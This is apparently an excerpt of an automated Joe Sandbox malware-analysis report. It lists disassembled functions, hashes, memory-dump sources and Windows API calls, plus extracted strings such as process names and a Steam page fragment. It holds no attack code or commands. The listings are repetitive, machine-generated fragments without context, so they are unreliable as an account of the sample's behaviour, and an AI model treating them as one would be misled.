                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                                                                                                                                                          • Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90
                                                                                                                                                                                          Function 0003859A Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                          • Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
                                                                                                                                                                                          • Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50
                                                                                                                                                                                          Function 00038599 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
                                                                                                                                                                                          • Instruction ID: 81b03007a1f881deed44a42fc0175a6fbd256bce6d09bf2effb1e14420dd7128
                                                                                                                                                                                          • Opcode Fuzzy Hash: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
                                                                                                                                                                                          • Instruction Fuzzy Hash: DEE04278A55644DFC741CF58D195E99B7F0EB09368F158199E806DB761C274EE00DF00
                                                                                                                                                                                          Function 0002148A Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                          • Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
                                                                                                                                                                                          • Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                          • Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58
                                                                                                                                                                                          Function 000214A2 Relevance: .0, Instructions: 3COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                          • Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                          • Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950
                                                                                                                                                                                          Function 0002DCA0 Relevance: 90.4, APIs: 60, Instructions: 399memorystringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0002DB7F: lstrlenA.KERNEL32(?,750A5460,?,00000000), ref: 0002DBBB
                                                                                                                                                                                            • Part of subcall function 0002DB7F: strchr.MSVCRT ref: 0002DBCD
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,750A5460,?,00000000), ref: 0002DD04
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002DD0B
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DD20
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DD27
                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0002DD43
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DD55
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DD62
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0002DD93
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DD9A
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 0002DDA1
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002DDA8
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DDBD
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DDC4
                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0002DDDA
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DDEC
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DDF3
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0002DE11
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DE18
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 0002DE1F
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002DE26
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DE3B
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DE42
                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0002DE52
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DE64
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DE6B
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0002DE93
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DE9A
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 0002DEA1
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002DEA8
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DEC3
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DECA
                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0002DEDD
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DEEF
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DEF6
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0002DEFF
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0002DF15
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002DF1C
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0002DF34
                                                                                                                                                                                            • Part of subcall function 0002F128: std::_Xinvalid_argument.LIBCPMT ref: 0002F13E
                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0002DF75
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 0002DF9B
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DFA8
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002DFAD
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0002DFBC
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002DFC3
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DFD7
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002DFDE
                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0002DFEC
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002DFF9
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002E000
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002E035
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002E03C
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 0002E043
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002E04A
                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0002E065
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002E077
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002E07E
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002E122
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002E129
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0002E173
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 0002E17A
                                                                                                                                                                                            • Part of subcall function 0002DB7F: strchr.MSVCRT ref: 0002DBF2
                                                                                                                                                                                            • Part of subcall function 0002DB7F: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0002DCF7), ref: 0002DC14
                                                                                                                                                                                            • Part of subcall function 0002DB7F: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0002DC21
                                                                                                                                                                                            • Part of subcall function 0002DB7F: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0002DCF7), ref: 0002DC28
                                                                                                                                                                                            • Part of subcall function 0002DB7F: strcpy_s.MSVCRT ref: 0002DC6F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 838878465-0
                                                                                                                                                                                          • Opcode ID: 2106d857e8a1ce7e968cd6460e82609c6d5db73250cf8b35465ee105c98c6632
                                                                                                                                                                                          • Instruction ID: 787dd9dbe4e0c64189f28fb695e72d52d7c6323d8354be2835b8d93f85a13aa8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2106d857e8a1ce7e968cd6460e82609c6d5db73250cf8b35465ee105c98c6632
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60E12F72C00229AFEF21AFF4EC89ADEBF78BF08305F15446AF515A7152DA3558849F20
                                                                                                                                                                                          Function 6C45CC00 Relevance: 78.2, APIs: 25, Strings: 27, Instructions: 233stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C42582D), ref: 6C45CC27
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C42582D), ref: 6C45CC3D
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C48FE98,?,?,?,?,?,6C42582D), ref: 6C45CC56
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C42582D), ref: 6C45CC6C
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C42582D), ref: 6C45CC82
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C42582D), ref: 6C45CC98
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C42582D), ref: 6C45CCAE
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C45CCC4
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C45CCDA
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C45CCEC
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C45CCFE
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C45CD14
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C45CD82
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C45CD98
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C45CDAE
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C45CDC4
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C45CDDA
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C45CDF0
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C45CE06
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C45CE1C
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C45CE32
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C45CE48
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C45CE5E
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C45CE74
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C45CE8A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • nativeallocations, xrefs: 6C45CDA8
                                                                                                                                                                                          • .exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon., xrefs: 6C45CF1D
                                                                                                                                                                                          • ipcmessages, xrefs: 6C45CDBE
                                                                                                                                                                                          • java, xrefs: 6C45CC37
                                                                                                                                                                                          • stackwalk, xrefs: 6C45CCF8
                                                                                                                                                                                          • fileioall, xrefs: 6C45CCA8
                                                                                                                                                                                          • preferencereads, xrefs: 6C45CD92
                                                                                                                                                                                          • noiostacks, xrefs: 6C45CCBE
                                                                                                                                                                                          • samplingallthreads, xrefs: 6C45CE2C
                                                                                                                                                                                          • seqstyle, xrefs: 6C45CCE6
                                                                                                                                                                                          • cpuallthreads, xrefs: 6C45CE16
                                                                                                                                                                                          • notimerresolutionchange, xrefs: 6C45CE00
                                                                                                                                                                                          • .exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon., xrefs: 6C45CF31
                                                                                                                                                                                          • mainthreadio, xrefs: 6C45CC7C
                                                                                                                                                                                          • fileio, xrefs: 6C45CC92
                                                                                                                                                                                          • Unrecognized feature "%s"., xrefs: 6C45CEA0
                                                                                                                                                                                          • audiocallbacktracing, xrefs: 6C45CDD4
                                                                                                                                                                                          • m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity, xrefs: 6C45CF27
                                                                                                                                                                                          • default, xrefs: 6C45CC21
                                                                                                                                                                                          • nostacksampling, xrefs: 6C45CD7C
                                                                                                                                                                                          • power, xrefs: 6C45CE84
                                                                                                                                                                                          • jsallocations, xrefs: 6C45CD0E
                                                                                                                                                                                          • markersallthreads, xrefs: 6C45CE42
                                                                                                                                                                                          • processcpu, xrefs: 6C45CE6E
                                                                                                                                                                                          • leaf, xrefs: 6C45CC66
                                                                                                                                                                                          • unregisteredthreads, xrefs: 6C45CE58
                                                                                                                                                                                          • screenshots, xrefs: 6C45CCD4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strcmp
                                                                                                                                                                                          • String ID: Unrecognized feature "%s".$.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.$.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
